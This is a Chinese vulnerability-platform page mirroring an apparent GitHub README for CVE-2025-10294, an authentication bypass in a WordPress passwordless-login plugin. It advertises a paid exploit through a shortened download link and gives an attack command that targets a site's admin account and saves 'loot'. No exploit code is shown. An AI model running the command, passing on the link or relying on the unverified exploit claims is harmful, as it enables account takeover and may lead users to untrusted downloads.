漏洞平台

POC详情： d5e301bffc19ef7833c76221f062e0e5b9e214d3

来源

https://github.com/h4xnz/CVE-2025-10294-POC

关联漏洞

标题： WordPress plugin OwnID Passwordless Login 安全漏洞 (CVE-2025-10294)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin OwnID Passwordless Login 1.3.4及之前版本存在安全漏洞，该漏洞源于未正确检查ownid_shared_secret值是否为空，可能导致身份验证绕过攻击。

介绍

# OwnID Passwordless Login Authentication Bypass (CVE-2025-10294)

### Summary
The OwnID plugin fails to properly validate the `ownid_shared_secret` header during JWT token processing in the authentication endpoint. This allows an attacker to forge a valid JWT payload without knowledge of the shared secret, granting unauthenticated access to any user account, including admins. No brute-force or prior creds needed – direct RCE potential via admin takeover.

## Vulnerability Details
- **CVE-ID:** CVE-2025-10294 / EUVD-2025-34544
- **Affected Component:** OwnID Passwordless Login plugin for WordPress
- **Versions Impacted:** <= 1.3.4
- **CWE:** 288 (Authentication Bypass Using an Alternate Path or Channel)
- **Severity:** Critical (CVSS 9.8)
- **Vendor:** OwnID
- **Patch:** Update to 1.3.5+


### Impact
- Unauthorized login as any WP user (admin/root access)
- Data exfil (posts, users, DB dumps)
- Site defacement/malware injection
- Backdoor persistence
- Lateral movement in multisite installs

### Prerequisites
- Target: WordPress site with OwnID Passwordless Login <=1.3.4 active
- Python 3.8+ (requests, PyJWT libs)
- Valid target URL (e.g., https://target.com/wp-json/ownid/v1/auth)

## Exploit
### **[Download here](https://tinyurl.com/3a8yz4r2)**

## Files Included (ZIP Contents)
| File || Description |
|------|------|-------------|
| README.txt | | Full documentation and usage guide |
| exploit.py  | | Main Python exploit script |
| requirements.txt | | Python dependencies |
| CHANGELOG.txt | | Version history |
| poc_video.mp4 | | 30s demo of exploit on live WP site |

### Usage
1. Get the full exploit files - [href](https://tinyurl.com/3a8yz4r2) (instant ZIP delivery with all scripts).
2. Unzip and install deps: `pip install -r requirements.txt`
3. Run: `python exploit.py -u https://target.com -t admin_username -p /tmp/loot.txt`


## Support & Contact
- Full Repo Access Includes: Updated scripts, custom payloads, 30-day support.
- No refunds – tested 40+ times.
- Legal: For authorized pentesting only. Buyer assumes all risk.
- **For inquiries, please contact:f0kinn@outlook.com**

文件快照


 [4.0K]  /data/pocs/d5e301bffc19ef7833c76221f062e0e5b9e214d3
└── [2.1K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。